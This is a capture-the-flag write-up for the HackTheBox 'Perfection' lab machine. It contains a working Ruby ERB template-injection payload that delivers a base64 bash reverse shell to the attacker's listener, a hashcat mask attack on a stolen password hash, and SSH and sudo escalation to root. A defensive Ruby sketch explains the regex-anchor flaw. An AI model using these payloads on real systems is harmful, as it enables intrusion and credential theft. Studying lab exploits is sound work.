HackTheBox Perfection Writeup
Explore the fundamentals of cybersecurity with the Perfection Capture The Flag (CTF) challenge, an easy-level experience designed to be accessible and ideal for beginners. This straightforward CTF write-up offers clear insights into essential Linux concepts.
Add Hosts
Edit the /etc/hosts file and add the following entry:
10.10.11.253 perfection.htb
This ensures that your system resolves the domain name perfection.htb to the correct IP address, 10.10.11.253.
Script to add hosts automatically
ip="10.10.11.253"
domain="perfection.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts
Mapping
nmap -sCV perfection.htb
Starting Nmap 7.95 ( https://nmap.org ) at 2024-09-12 11:20 CEST
Nmap scan report for perfection.htb (10.10.11.253)
Host is up (0.054s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 80:e4:79:e8:59:28:df:95:2d:ad:57:4a:46:04:ea:70 (ECDSA)
|_ 256 e9:ea:0c:1d:86:13:ed:95:a9:d0:0b:c8:22:e4:cf:e9 (ED25519)
80/tcp open http nginx
|_http-title: Weighted Grade Calculator
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Remote Code Execution (RCE)
To exploit the weighted-grade feature on perfection.htb and achieve remote code execution (RCE):
Run a listener to catch the reverse shell:
nc -lvnp 9001
Prepare and send the payload:
attackerip=$(ip a | grep -A 2 "tun0:" | grep -oP '(?<=inet\s)\d+(\.\d+){3}')
base=$(echo "/bin/bash -i >& /dev/tcp/$attackerip/9001 0>&1" | base64)
revsh="%0A<%25%3d+\`echo+$base|+base64+-d+|+bash\`+%25>"
curl 'http://perfection.htb/weighted-grade-calc' --compressed -X POST \
-H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0' \
-H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' \
-H 'Accept-Language: en-US,en;q=0.5' \
-H 'Accept-Encoding: gzip, deflate' \
-H 'Content-Type: application/x-www-form-urlencoded' \
-H 'Origin: http://perfection.htb' \
-H 'Connection: keep-alive' \
-H 'Referer: http://perfection.htb/weighted-grade-calc' \
-H 'Upgrade-Insecure-Requests: 1' \
--data-raw 'category1=1'$revsh'&grade1=51&weight1=60&category2=2&grade2=10&weight2=20&category3=3&grade3=10&weight3=10&category4=4&grade4=10&weight4=10&category5=5&grade5=0&weight5=0'
Once the reverse shell connects, execute:
cat "/home/$(ls /home/)/user.txt"
strings /home/$(ls /home)/Migration/pupilpath_credentials.db | awk -F'Susan Miller' '/Susan Miller/ {print $2}'
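The payload above places a URL-encoded newline (%0A) and then an ERB-style tag after a valid category value. The following Ruby sketch is an added example, not code from the original write-up or from the target application, showing why that shape gets past a line-anchored input check and how string anchors and a constant template close the gap. Assumptions: the page does not show the server code, so the validator patterns, function names and the harmless sample input are constructed for illustration.

```ruby
require 'erb'

# Hypothetical validators (the page does not show the server's own check).
# In Ruby, ^ and $ match at every line boundary, so one clean line is
# enough for the whole multi-line value to pass.
LINE_ANCHORED = /^[a-zA-Z0-9\/ ]+$/
# \A and \z match only at the start and end of the entire string.
STRING_ANCHORED = /\A[a-zA-Z0-9\/ ]+\z/

def weak_valid?(value)
  LINE_ANCHORED.match?(value)
end

def strict_valid?(value)
  STRING_ANCHORED.match?(value)
end

# Unsafe pattern: user input becomes part of the template source,
# so any ERB tag inside it is evaluated on the server.
def render_unsafe(category)
  ERB.new("Category: " + category).result(binding)
end

# Safer pattern: the template source is constant; input is passed in
# as data and HTML-escaped on output, so tags stay inert text.
SAFE_TEMPLATE = ERB.new("Category: <%= ERB::Util.html_escape(category) %>")

def render_safe(category)
  SAFE_TEMPLATE.result_with_hash(category: category)
end

# Constructed sample: same shape as the page's field value (valid text,
# newline, template tag) but with a harmless arithmetic expression.
SAMPLE = "1\n<%= 7 * 7 %>"

if __FILE__ == $0
  puts "weak check passes:   #{weak_valid?(SAMPLE)}"
  puts "strict check passes: #{strict_valid?(SAMPLE)}"
  puts "unsafe render: #{render_unsafe(SAMPLE).inspect}"
  puts "safe render:   #{render_safe(SAMPLE).inspect}"
end
```

Either fix alone blocks this input; applying both means a future validation gap does not turn into template evaluation.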
Brute Force the Hash
echo -n "Password Hash? -->" ; read hash
echo "$hash" > /tmp/hash.txt
hashcat -m 1400 -a 3 /tmp/hash.txt 'susan_nasus_?d?d?d?d?d?d?d?d?d'
hashcat /tmp/hash.txt --show
rm -rf /tmp/hash.txt
SSH into the Target
With the cracked password, log in via SSH:
ssh susan@perfection.htb
sudo su
cat /root/root.txt
This post is licensed under CC BY 4.0 by the author.